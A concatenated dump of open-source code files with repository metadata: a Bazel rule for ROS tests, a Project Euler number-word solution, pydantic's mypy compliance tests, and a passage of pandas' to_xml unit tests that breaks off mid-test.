de6ce813fe539aac67e8b0e2d072c20a18555ea1
| 1,320
|
bzl
|
Python
|
ros/test.bzl
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | 14
|
2021-05-02T00:58:45.000Z
|
2022-01-11T07:01:27.000Z
|
ros/test.bzl
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | null | null | null |
ros/test.bzl
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | 1
|
2022-02-07T00:17:23.000Z
|
2022-02-07T00:17:23.000Z
|
"""Implements functionality for defining ROS tests.
"""
load("//third_party:expand_template.bzl", "expand_template")
load("@rules_python//python:defs.bzl", "py_test")
def ros_test(name, nodes, launch_file, launch_args = None, size = None):
"""Defines a ROS test.
Args:
name: The name of the test.
nodes: The nodes used by the test.
launch_file: The launch file used by the test.
launch_args: The launch arguments used by the test.
size: The size of the test.
"""
launch_file_path = "'$(location {})'".format(launch_file)
launch_args = launch_args or []
substitutions = {
"{launch_file}": launch_file_path,
"{launch_args}": ", ".join(launch_args),
}
launch_script = "{}_launch.py".format(name)
expand_template(
name = "{}_launch_gen".format(name),
template = "@com_github_mvukov_rules_ros//ros:test.py.tpl",
substitutions = substitutions,
out = launch_script,
data = [launch_file],
)
py_test(
name = name,
size = size or "medium",
srcs = [launch_script],
data = nodes + [launch_file],
main = launch_script,
visibility = ["//visibility:public"],
deps = ["@com_github_mvukov_rules_ros//third_party/legacy_rostest"],
)
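# Hypothetical usage sketch (not part of the original file, shown as comments
# only): a BUILD target wiring ros_test() to assumed node and launch-file
# labels. The label names ":talker", ":listener" and the launch file path are
# invented for illustration.
#
#   load("//ros:test.bzl", "ros_test")
#
#   ros_test(
#       name = "talker_listener_test",
#       nodes = [":talker", ":listener"],
#       launch_file = "test/talker_listener.test",
#       size = "small",
#   )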
| 31.428571
| 76
| 0.619697
|
980065ef92b38d4a6696df91cabfc6eed31f38f7
| 1,437
|
py
|
Python
|
1-99/t17.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
1-99/t17.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
1-99/t17.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
mapped_number = {
1: 'one',
2: 'two',
3: 'three',
4: 'four',
5: 'five',
6: 'six',
7: 'seven',
8: 'eight',
9: 'nine',
10: 'ten',
11: 'eleven',
12: 'twelve',
13: 'thirteen',
14: 'fourteen',
15: 'fifteen',
16: 'sixteen',
17: 'seventeen',
18: 'eighteen',
19: 'nineteen',
20: 'twenty',
30: 'thirty',
40: 'forty',
50: 'fifty',
60: 'sixty',
70: 'seventy',
80: 'eighty',
90: 'ninety',
100: 'hundred',
1000: 'thousand',
}
def lexical_cast(n):
if n < 21:
return mapped_number[n]
elif n < 100:
d = int(n / 10) * 10
t = int(n % 10)
if t == 0:
return mapped_number[d]
else:
return '%s %s' % (mapped_number[d], mapped_number[t])
elif n == 100 or n == 1000:
return '%s %s' % (mapped_number[1], mapped_number[n])
elif n < 1000:
d = int(n / 100)
t = int(n % 100)
if t == 0:
return '%s %s' % (mapped_number[d], mapped_number[100])
else:
return '%s %s and %s' % (mapped_number[d], mapped_number[100], lexical_cast(t))
def length_of_lexical_numbers(t, b):
view = ''
for i in range(t, b+1):
view += lexical_cast(i)
view = view.replace(' ', '')
return len(view)
def main():
print length_of_lexical_numbers(1, 1000)
if __name__ == '__main__':
main()
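# Worked example (comment only, added for illustration): lexical_cast(342)
# returns "three hundred and forty two", which counts as 23 letters once
# spaces are stripped, and lexical_cast(115) returns "one hundred and
# fifteen" (20 letters) -- the convention length_of_lexical_numbers relies on.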
| 20.528571
| 91
| 0.491997
|
4d8d0c1411bfe6ba5b793076b49281d4a101ff86
| 5,999
|
py
|
Python
|
tests/mypy/modules/success.py
|
sbv-csis/pydantic
|
eb21f92a7d2a1cda26b77b73cdc72ddec933aaf9
|
[
"MIT"
] | 2
|
2021-05-26T14:33:45.000Z
|
2022-01-22T13:07:57.000Z
|
tests/mypy/modules/success.py
|
sbv-csis/pydantic
|
eb21f92a7d2a1cda26b77b73cdc72ddec933aaf9
|
[
"MIT"
] | 98
|
2021-03-07T15:01:32.000Z
|
2022-03-28T18:05:24.000Z
|
tests/mypy/modules/success.py
|
sbv-csis/pydantic
|
eb21f92a7d2a1cda26b77b73cdc72ddec933aaf9
|
[
"MIT"
] | 1
|
2022-02-05T13:47:21.000Z
|
2022-02-05T13:47:21.000Z
|
"""
Test pydantic's compliance with mypy.
Do a little skipping about with types to demonstrate its usage.
"""
import json
import sys
from datetime import date, datetime
from pathlib import Path
from typing import Any, Dict, Generic, List, Optional, TypeVar
from uuid import UUID
from pydantic import (
UUID1,
BaseModel,
DirectoryPath,
FilePath,
Json,
NegativeFloat,
NegativeInt,
NoneStr,
NonNegativeFloat,
NonNegativeInt,
NonPositiveFloat,
NonPositiveInt,
PositiveFloat,
PositiveInt,
PyObject,
StrictBool,
StrictBytes,
StrictFloat,
StrictInt,
StrictStr,
root_validator,
validate_arguments,
validator,
)
from pydantic.fields import Field, PrivateAttr
from pydantic.generics import GenericModel
from pydantic.typing import ForwardRef
class Flags(BaseModel):
strict_bool: StrictBool = False
def __str__(self) -> str:
return f'flag={self.strict_bool}'
class Model(BaseModel):
age: int
first_name = 'John'
last_name: NoneStr = None
signup_ts: Optional[datetime] = None
list_of_ints: List[int]
@validator('age')
def check_age(cls, value: int) -> int:
assert value < 100, 'too old'
return value
@root_validator
def root_check(cls, values: Dict[str, Any]) -> Dict[str, Any]:
return values
@root_validator(pre=True, allow_reuse=False, skip_on_failure=False)
def pre_root_check(cls, values: Dict[str, Any]) -> Dict[str, Any]:
return values
def dog_years(age: int) -> int:
return age * 7
def day_of_week(dt: datetime) -> int:
return dt.date().isoweekday()
m = Model(age=21, list_of_ints=[1, '2', b'3'])
assert m.age == 21, m.age
m.age = 42
assert m.age == 42, m.age
assert m.first_name == 'John', m.first_name
assert m.last_name is None, m.last_name
assert m.list_of_ints == [1, 2, 3], m.list_of_ints
dog_age = dog_years(m.age)
assert dog_age == 294, dog_age
m = Model(age=2, first_name=b'Woof', last_name=b'Woof', signup_ts='2017-06-07 00:00', list_of_ints=[1, '2', b'3'])
assert m.first_name == 'Woof', m.first_name
assert m.last_name == 'Woof', m.last_name
assert m.signup_ts == datetime(2017, 6, 7), m.signup_ts
assert day_of_week(m.signup_ts) == 3
data = {'age': 10, 'first_name': 'Alena', 'last_name': 'Sousova', 'list_of_ints': [410]}
m_from_obj = Model.parse_obj(data)
assert isinstance(m_from_obj, Model)
assert m_from_obj.age == 10
assert m_from_obj.first_name == data['first_name']
assert m_from_obj.last_name == data['last_name']
assert m_from_obj.list_of_ints == data['list_of_ints']
m_from_raw = Model.parse_raw(json.dumps(data))
assert isinstance(m_from_raw, Model)
assert m_from_raw.age == m_from_obj.age
assert m_from_raw.first_name == m_from_obj.first_name
assert m_from_raw.last_name == m_from_obj.last_name
assert m_from_raw.list_of_ints == m_from_obj.list_of_ints
m_copy = m_from_obj.copy()
assert isinstance(m_from_raw, Model)
assert m_copy.age == m_from_obj.age
assert m_copy.first_name == m_from_obj.first_name
assert m_copy.last_name == m_from_obj.last_name
assert m_copy.list_of_ints == m_from_obj.list_of_ints
if sys.version_info >= (3, 7):
T = TypeVar('T')
class WrapperModel(GenericModel, Generic[T]):
payload: T
int_instance = WrapperModel[int](payload=1)
int_instance.payload += 1
assert int_instance.payload == 2
str_instance = WrapperModel[str](payload='a')
str_instance.payload += 'a'
assert str_instance.payload == 'aa'
model_instance = WrapperModel[Model](payload=m)
model_instance.payload.list_of_ints.append(4)
assert model_instance.payload.list_of_ints == [1, 2, 3, 4]
class WithField(BaseModel):
age: int
first_name: str = Field('John', const=True)
# simple decorator
@validate_arguments
def foo(a: int, *, c: str = 'x') -> str:
return c * a
foo(1, c='thing')
foo(1)
# nested decorator should not produce an error
@validate_arguments(config={'arbitrary_types_allowed': True})
def bar(a: int, *, c: str = 'x') -> str:
return c * a
bar(1, c='thing')
bar(1)
class Foo(BaseModel):
a: int
FooRef = ForwardRef('Foo')
class MyConf(BaseModel):
str_pyobject: PyObject = Field('datetime.date')
callable_pyobject: PyObject = Field(date)
conf = MyConf()
var1: date = conf.str_pyobject(2020, 12, 20)
var2: date = conf.callable_pyobject(2111, 1, 1)
class MyPrivateAttr(BaseModel):
_private_field: str = PrivateAttr()
class PydanticTypes(BaseModel):
# Boolean
my_strict_bool: StrictBool = True
# Integer
my_positive_int: PositiveInt = 1
my_negative_int: NegativeInt = -1
my_non_positive_int: NonPositiveInt = -1
my_non_negative_int: NonNegativeInt = 1
my_strict_int: StrictInt = 1
# Float
my_positive_float: PositiveFloat = 1.1
my_negative_float: NegativeFloat = -1.1
my_non_positive_float: NonPositiveFloat = -1.1
my_non_negative_float: NonNegativeFloat = 1.1
my_strict_float: StrictFloat = 1.1
# Bytes
my_strict_bytes: StrictBytes = b'pika'
# String
my_strict_str: StrictStr = 'pika'
# PyObject
my_pyobject_str: PyObject = 'datetime.date' # type: ignore
my_pyobject_callable: PyObject = date
# UUID
my_uuid1: UUID1 = UUID('a8098c1a-f86e-11da-bd1a-00112444be1e')
my_uuid1_str: UUID1 = 'a8098c1a-f86e-11da-bd1a-00112444be1e' # type: ignore
# Path
my_file_path: FilePath = Path(__file__)
my_file_path_str: FilePath = __file__ # type: ignore
my_dir_path: DirectoryPath = Path('.')
my_dir_path_str: DirectoryPath = '.' # type: ignore
# Json
my_json: Json = '{"hello": "world"}'
class Config:
validate_all = True
validated = PydanticTypes()
validated.my_pyobject_str(2021, 1, 1)
validated.my_pyobject_callable(2021, 1, 1)
validated.my_uuid1.hex
validated.my_uuid1_str.hex
validated.my_file_path.absolute()
validated.my_file_path_str.absolute()
validated.my_dir_path.absolute()
validated.my_dir_path_str.absolute()
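# Illustrative note (not part of the original file): this module is meant to be
# type-checked rather than only executed. A hedged invocation sketch, assuming
# mypy is installed together with pydantic's mypy plugin configuration, would
# be something like:
#
#   mypy tests/mypy/modules/success.py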
| 25.312236
| 114
| 0.705618
|
97793ce8f65b8f39b67016b04c209af937aed0df
| 33,629
|
py
|
Python
|
pandas/tests/io/xml/test_to_xml.py
|
madhuv2002/pandas
|
006f1e0efb3ec81d52ff4d080b0c770b7b79d041
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | 2
|
2021-05-07T04:58:36.000Z
|
2021-05-07T04:58:59.000Z
|
pandas/tests/io/xml/test_to_xml.py
|
madhuv2002/pandas
|
006f1e0efb3ec81d52ff4d080b0c770b7b79d041
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/io/xml/test_to_xml.py
|
madhuv2002/pandas
|
006f1e0efb3ec81d52ff4d080b0c770b7b79d041
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | 2
|
2021-06-16T07:19:12.000Z
|
2021-12-16T10:24:44.000Z
|
from io import (
BytesIO,
StringIO,
)
import os
import sys
from typing import Union
import numpy as np
import pytest
import pandas.util._test_decorators as td
from pandas import DataFrame
import pandas._testing as tm
from pandas.io.common import get_handle
from pandas.io.xml import read_xml
"""
CHECKLIST
[x] - ValueError: "Values for parser can only be lxml or etree."
etree
[x] - ImportError: "lxml not found, please install or use the etree parser."
[X] - TypeError: "...is not a valid type for attr_cols"
[X] - TypeError: "...is not a valid type for elem_cols"
[X] - LookupError: "unknown encoding"
[X] - KeyError: "...is not included in namespaces"
[X] - KeyError: "no valid column"
[X] - ValueError: "To use stylesheet, you need lxml installed..."
[] - OSError: (NEED PERMISSION ISSUE, DISK FULL, ETC.)
[X] - FileNotFoundError: "No such file or directory"
[X] - PermissionError: "Forbidden"
lxml
[X] - TypeError: "...is not a valid type for attr_cols"
[X] - TypeError: "...is not a valid type for elem_cols"
[X] - LookupError: "unknown encoding"
[] - OSError: (NEED PERMISSION ISSUE, DISK FULL, ETC.)
[X] - FileNotFoundError: "No such file or directory"
[X] - KeyError: "...is not included in namespaces"
[X] - KeyError: "no valid column"
[X] - ValueError: "stylesheet is not a url, file, or xml string."
[] - LookupError: (NEED WRONG ENCODING FOR FILE OUTPUT)
[] - URLError: (USUALLY DUE TO NETWORKING)
[] - HTTPError: (NEED AN ONLINE STYLESHEET)
[X] - OSError: "failed to load external entity"
[X] - XMLSyntaxError: "Opening and ending tag mismatch"
[X] - XSLTApplyError: "Cannot resolve URI"
[X] - XSLTParseError: "failed to compile"
[X] - PermissionError: "Forbidden"
"""
geom_df = DataFrame(
{
"shape": ["square", "circle", "triangle"],
"degrees": [360, 360, 180],
"sides": [4, np.nan, 3],
}
)
planet_df = DataFrame(
{
"planet": [
"Mercury",
"Venus",
"Earth",
"Mars",
"Jupiter",
"Saturn",
"Uranus",
"Neptune",
],
"type": [
"terrestrial",
"terrestrial",
"terrestrial",
"terrestrial",
"gas giant",
"gas giant",
"ice giant",
"ice giant",
],
"location": [
"inner",
"inner",
"inner",
"inner",
"outer",
"outer",
"outer",
"outer",
],
"mass": [
0.330114,
4.86747,
5.97237,
0.641712,
1898.187,
568.3174,
86.8127,
102.4126,
],
}
)
from_file_expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<index>0</index>
<category>cooking</category>
<title>Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.0</price>
</row>
<row>
<index>1</index>
<category>children</category>
<title>Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</row>
<row>
<index>2</index>
<category>web</category>
<title>Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</row>
</data>"""
def equalize_decl(doc):
# etree and lxml differ on quotes and case in xml declaration
if doc is not None:
doc = doc.replace(
'<?xml version="1.0" encoding="utf-8"?',
"<?xml version='1.0' encoding='utf-8'?",
)
return doc
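# Illustrative note (not part of the original tests): equalize_decl() only
# normalizes the XML declaration, e.g. it rewrites
#   <?xml version="1.0" encoding="utf-8"?>
# into
#   <?xml version='1.0' encoding='utf-8'?>
# so output from either parser can be compared against the single-quoted
# expected strings used throughout this module.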
@pytest.fixture(params=["rb", "r"])
def mode(request):
return request.param
@pytest.fixture(params=[pytest.param("lxml", marks=td.skip_if_no("lxml")), "etree"])
def parser(request):
return request.param
# FILE OUTPUT
def test_file_output_str_read(datapath, parser):
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, parser=parser)
with open(path, "rb") as f:
output = f.read().decode("utf-8").strip()
output = equalize_decl(output)
assert output == from_file_expected
def test_file_output_bytes_read(datapath, parser):
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, parser=parser)
with open(path, "rb") as f:
output = f.read().decode("utf-8").strip()
output = equalize_decl(output)
assert output == from_file_expected
def test_str_output(datapath, parser):
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
output = df_file.to_xml(parser=parser)
output = equalize_decl(output)
assert output == from_file_expected
def test_wrong_file_path(parser):
with pytest.raises(
FileNotFoundError, match=("No such file or directory|没有那个文件或目录")
):
geom_df.to_xml("/my/fake/path/output.xml", parser=parser)
# INDEX
def test_index_false(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<category>cooking</category>
<title>Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.0</price>
</row>
<row>
<category>children</category>
<title>Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</row>
<row>
<category>web</category>
<title>Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</row>
</data>"""
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, index=False, parser=parser)
with open(path, "rb") as f:
output = f.read().decode("utf-8").strip()
output = equalize_decl(output)
assert output == expected
def test_index_false_rename_row_root(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<books>
<book>
<category>cooking</category>
<title>Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.0</price>
</book>
<book>
<category>children</category>
<title>Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</book>
<book>
<category>web</category>
<title>Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</book>
</books>"""
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(
path, index=False, root_name="books", row_name="book", parser=parser
)
with open(path, "rb") as f:
output = f.read().decode("utf-8").strip()
output = equalize_decl(output)
assert output == expected
# NA_REP
na_expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides/>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
def test_na_elem_output(datapath, parser):
output = geom_df.to_xml(parser=parser)
output = equalize_decl(output)
assert output == na_expected
def test_na_empty_str_elem_option(datapath, parser):
output = geom_df.to_xml(na_rep="", parser=parser)
output = equalize_decl(output)
assert output == na_expected
def test_na_empty_elem_option(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides>0.0</sides>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
output = geom_df.to_xml(na_rep="0.0", parser=parser)
output = equalize_decl(output)
assert output == expected
# ATTR_COLS
@pytest.mark.skipif(
sys.version_info < (3, 8),
reason=("etree alpha ordered attributes <= py3.7"),
)
def test_attrs_cols_nan_output(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row index="0" shape="square" degrees="360" sides="4.0"/>
<row index="1" shape="circle" degrees="360"/>
<row index="2" shape="triangle" degrees="180" sides="3.0"/>
</data>"""
output = geom_df.to_xml(attr_cols=["shape", "degrees", "sides"], parser=parser)
output = equalize_decl(output)
assert output == expected
@pytest.mark.skipif(
sys.version_info < (3, 8),
reason=("etree alpha ordered attributes <= py3.7"),
)
def test_attrs_cols_prefix(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<doc:data xmlns:doc="http://example.xom">
<doc:row doc:index="0" doc:shape="square" \
doc:degrees="360" doc:sides="4.0"/>
<doc:row doc:index="1" doc:shape="circle" \
doc:degrees="360"/>
<doc:row doc:index="2" doc:shape="triangle" \
doc:degrees="180" doc:sides="3.0"/>
</doc:data>"""
output = geom_df.to_xml(
attr_cols=["index", "shape", "degrees", "sides"],
namespaces={"doc": "http://example.xom"},
prefix="doc",
parser=parser,
)
output = equalize_decl(output)
assert output == expected
def test_attrs_unknown_column(parser):
with pytest.raises(KeyError, match=("no valid column")):
geom_df.to_xml(attr_cols=["shape", "degreees", "sides"], parser=parser)
def test_attrs_wrong_type(parser):
with pytest.raises(TypeError, match=("is not a valid type for attr_cols")):
geom_df.to_xml(attr_cols='"shape", "degreees", "sides"', parser=parser)
# ELEM_COLS
def test_elems_cols_nan_output(datapath, parser):
elems_cols_expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<degrees>360</degrees>
<sides>4.0</sides>
<shape>square</shape>
</row>
<row>
<degrees>360</degrees>
<sides/>
<shape>circle</shape>
</row>
<row>
<degrees>180</degrees>
<sides>3.0</sides>
<shape>triangle</shape>
</row>
</data>"""
output = geom_df.to_xml(
index=False, elem_cols=["degrees", "sides", "shape"], parser=parser
)
output = equalize_decl(output)
assert output == elems_cols_expected
def test_elems_unknown_column(parser):
with pytest.raises(KeyError, match=("no valid column")):
geom_df.to_xml(elem_cols=["shape", "degreees", "sides"], parser=parser)
def test_elems_wrong_type(parser):
with pytest.raises(TypeError, match=("is not a valid type for elem_cols")):
geom_df.to_xml(elem_cols='"shape", "degreees", "sides"', parser=parser)
def test_elems_and_attrs_cols(datapath, parser):
elems_cols_expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row shape="square">
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row shape="circle">
<degrees>360</degrees>
<sides/>
</row>
<row shape="triangle">
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
output = geom_df.to_xml(
index=False,
elem_cols=["degrees", "sides"],
attr_cols=["shape"],
parser=parser,
)
output = equalize_decl(output)
assert output == elems_cols_expected
# HIERARCHICAL COLUMNS
def test_hierarchical_columns(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<location>inner</location>
<type>terrestrial</type>
<count_mass>4</count_mass>
<sum_mass>11.81</sum_mass>
<mean_mass>2.95</mean_mass>
</row>
<row>
<location>outer</location>
<type>gas giant</type>
<count_mass>2</count_mass>
<sum_mass>2466.5</sum_mass>
<mean_mass>1233.25</mean_mass>
</row>
<row>
<location>outer</location>
<type>ice giant</type>
<count_mass>2</count_mass>
<sum_mass>189.23</sum_mass>
<mean_mass>94.61</mean_mass>
</row>
<row>
<location>All</location>
<type/>
<count_mass>8</count_mass>
<sum_mass>2667.54</sum_mass>
<mean_mass>333.44</mean_mass>
</row>
</data>"""
pvt = planet_df.pivot_table(
index=["location", "type"],
values="mass",
aggfunc=["count", "sum", "mean"],
margins=True,
).round(2)
output = pvt.to_xml(parser=parser)
output = equalize_decl(output)
assert output == expected
@pytest.mark.skipif(
sys.version_info < (3, 8),
reason=("etree alpha ordered attributes <= py3.7"),
)
def test_hierarchical_attrs_columns(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row location="inner" type="terrestrial" count_mass="4" \
sum_mass="11.81" mean_mass="2.95"/>
<row location="outer" type="gas giant" count_mass="2" \
sum_mass="2466.5" mean_mass="1233.25"/>
<row location="outer" type="ice giant" count_mass="2" \
sum_mass="189.23" mean_mass="94.61"/>
<row location="All" type="" count_mass="8" \
sum_mass="2667.54" mean_mass="333.44"/>
</data>"""
pvt = planet_df.pivot_table(
index=["location", "type"],
values="mass",
aggfunc=["count", "sum", "mean"],
margins=True,
).round(2)
output = pvt.to_xml(attr_cols=list(pvt.reset_index().columns.values), parser=parser)
output = equalize_decl(output)
assert output == expected
# MULTIINDEX
def test_multi_index(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<location>inner</location>
<type>terrestrial</type>
<count>4</count>
<sum>11.81</sum>
<mean>2.95</mean>
</row>
<row>
<location>outer</location>
<type>gas giant</type>
<count>2</count>
<sum>2466.5</sum>
<mean>1233.25</mean>
</row>
<row>
<location>outer</location>
<type>ice giant</type>
<count>2</count>
<sum>189.23</sum>
<mean>94.61</mean>
</row>
</data>"""
agg = (
planet_df.groupby(["location", "type"])["mass"]
.agg(["count", "sum", "mean"])
.round(2)
)
output = agg.to_xml(parser=parser)
output = equalize_decl(output)
assert output == expected
@pytest.mark.skipif(
sys.version_info < (3, 8),
reason=("etree alpha ordered attributes <= py3.7"),
)
def test_multi_index_attrs_cols(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row location="inner" type="terrestrial" count="4" \
sum="11.81" mean="2.95"/>
<row location="outer" type="gas giant" count="2" \
sum="2466.5" mean="1233.25"/>
<row location="outer" type="ice giant" count="2" \
sum="189.23" mean="94.61"/>
</data>"""
agg = (
planet_df.groupby(["location", "type"])["mass"]
.agg(["count", "sum", "mean"])
.round(2)
)
output = agg.to_xml(attr_cols=list(agg.reset_index().columns.values), parser=parser)
output = equalize_decl(output)
assert output == expected
# NAMESPACE
def test_default_namespace(parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data xmlns="http://example.com">
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides/>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
output = geom_df.to_xml(namespaces={"": "http://example.com"}, parser=parser)
output = equalize_decl(output)
assert output == expected
# PREFIX
def test_namespace_prefix(parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<doc:data xmlns:doc="http://example.com">
<doc:row>
<doc:index>0</doc:index>
<doc:shape>square</doc:shape>
<doc:degrees>360</doc:degrees>
<doc:sides>4.0</doc:sides>
</doc:row>
<doc:row>
<doc:index>1</doc:index>
<doc:shape>circle</doc:shape>
<doc:degrees>360</doc:degrees>
<doc:sides/>
</doc:row>
<doc:row>
<doc:index>2</doc:index>
<doc:shape>triangle</doc:shape>
<doc:degrees>180</doc:degrees>
<doc:sides>3.0</doc:sides>
</doc:row>
</doc:data>"""
output = geom_df.to_xml(
namespaces={"doc": "http://example.com"}, prefix="doc", parser=parser
)
output = equalize_decl(output)
assert output == expected
def test_missing_prefix_in_nmsp(parser):
with pytest.raises(KeyError, match=("doc is not included in namespaces")):
geom_df.to_xml(
namespaces={"": "http://example.com"}, prefix="doc", parser=parser
)
def test_namespace_prefix_and_default(parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<doc:data xmlns="http://example.com" xmlns:doc="http://other.org">
<doc:row>
<doc:index>0</doc:index>
<doc:shape>square</doc:shape>
<doc:degrees>360</doc:degrees>
<doc:sides>4.0</doc:sides>
</doc:row>
<doc:row>
<doc:index>1</doc:index>
<doc:shape>circle</doc:shape>
<doc:degrees>360</doc:degrees>
<doc:sides/>
</doc:row>
<doc:row>
<doc:index>2</doc:index>
<doc:shape>triangle</doc:shape>
<doc:degrees>180</doc:degrees>
<doc:sides>3.0</doc:sides>
</doc:row>
</doc:data>"""
output = geom_df.to_xml(
namespaces={"": "http://example.com", "doc": "http://other.org"},
prefix="doc",
parser=parser,
)
output = equalize_decl(output)
if output is not None:
# etree and lxml differ on the order of namespace prefixes
output = output.replace(
'xmlns:doc="http://other.org" xmlns="http://example.com"',
'xmlns="http://example.com" xmlns:doc="http://other.org"',
)
assert output == expected
# ENCODING
encoding_expected = """\
<?xml version='1.0' encoding='ISO-8859-1'?>
<data>
<row>
<index>0</index>
<rank>1</rank>
<malename>José</malename>
<femalename>Sofía</femalename>
</row>
<row>
<index>1</index>
<rank>2</rank>
<malename>Luis</malename>
<femalename>Valentina</femalename>
</row>
<row>
<index>2</index>
<rank>3</rank>
<malename>Carlos</malename>
<femalename>Isabella</femalename>
</row>
<row>
<index>3</index>
<rank>4</rank>
<malename>Juan</malename>
<femalename>Camila</femalename>
</row>
<row>
<index>4</index>
<rank>5</rank>
<malename>Jorge</malename>
<femalename>Valeria</femalename>
</row>
</data>"""
def test_encoding_option_str(datapath, parser):
filename = datapath("io", "data", "xml", "baby_names.xml")
df_file = read_xml(filename, parser=parser, encoding="ISO-8859-1").head(5)
output = df_file.to_xml(encoding="ISO-8859-1", parser=parser)
if output is not None:
# etree and lxml differ on quotes and case in xml declaration
output = output.replace(
'<?xml version="1.0" encoding="ISO-8859-1"?',
"<?xml version='1.0' encoding='ISO-8859-1'?",
)
assert output == encoding_expected
@td.skip_if_no("lxml")
def test_correct_encoding_file(datapath):
filename = datapath("io", "data", "xml", "baby_names.xml")
df_file = read_xml(filename, encoding="ISO-8859-1", parser="lxml")
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, index=False, encoding="ISO-8859-1", parser="lxml")
@td.skip_if_no("lxml")
@pytest.mark.parametrize("encoding", ["UTF-8", "UTF-16", "ISO-8859-1"])
def test_wrong_encoding_option_lxml(datapath, parser, encoding):
filename = datapath("io", "data", "xml", "baby_names.xml")
df_file = read_xml(filename, encoding="ISO-8859-1", parser="lxml")
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, index=False, encoding=encoding, parser=parser)
def test_misspelled_encoding(parser):
with pytest.raises(LookupError, match=("unknown encoding")):
geom_df.to_xml(encoding="uft-8", parser=parser)
# PRETTY PRINT
@td.skip_if_no("lxml")
def test_xml_declaration_pretty_print():
expected = """\
<data>
<row>
<index>0</index>
<shape>square</shape>
<degrees>360</degrees>
<sides>4.0</sides>
</row>
<row>
<index>1</index>
<shape>circle</shape>
<degrees>360</degrees>
<sides/>
</row>
<row>
<index>2</index>
<shape>triangle</shape>
<degrees>180</degrees>
<sides>3.0</sides>
</row>
</data>"""
output = geom_df.to_xml(xml_declaration=False)
assert output == expected
def test_no_pretty_print_with_decl(parser):
expected = (
"<?xml version='1.0' encoding='utf-8'?>\n"
"<data><row><index>0</index><shape>square</shape>"
"<degrees>360</degrees><sides>4.0</sides></row><row>"
"<index>1</index><shape>circle</shape><degrees>360"
"</degrees><sides/></row><row><index>2</index><shape>"
